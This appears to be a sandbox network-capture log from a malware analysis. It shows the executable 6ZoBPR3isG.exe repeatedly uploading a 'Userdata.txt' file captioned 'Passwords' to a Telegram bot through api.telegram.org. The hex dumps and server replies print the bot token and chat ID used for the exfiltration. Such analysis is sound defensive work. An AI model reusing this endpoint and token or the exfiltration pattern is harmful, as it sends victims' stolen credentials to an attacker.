2025-01-10 21:32:25 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43599,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544745,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.3	50034	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:26 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33b076f9a624 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:26 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 62 30 37 36 66 39 61 36 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33b076f9a624Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:26 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:26 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:26 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43600,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544746,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.3	50036	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:28 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33ca520e7546 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:28 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 63 61 35 32 30 65 37 35 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33ca520e7546Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:28 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:28 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:28 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43601,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544748,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.3	50038	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:29 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33e6acba1ad5 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:29 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 65 36 61 63 62 61 31 61 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33e6acba1ad5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:30 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:30 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:30 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43602,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544750,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.3	50040	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:31 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd340583ccdc25 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:31 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 30 35 38 33 63 63 64 63 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd340583ccdc25Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:31 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:31 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:31 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 35 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43603,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544751,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.3	50042	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:33 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3426d43febc9 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:33 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 32 36 64 34 33 66 65 62 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3426d43febc9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:33 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:33 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:33 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43604,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544753,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.3	50044	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:34 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd34480a945b45 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:34 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 34 38 30 61 39 34 35 62 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd34480a945b45Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:34 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:34 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:34 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43605,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544754,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.3	50046	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:36 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd346e41e58404 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:36 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 36 65 34 31 65 35 38 34 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd346e41e58404Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:36 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:36 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:36 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43606,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544756,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.3	50048	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:37 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3496e44435c9 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
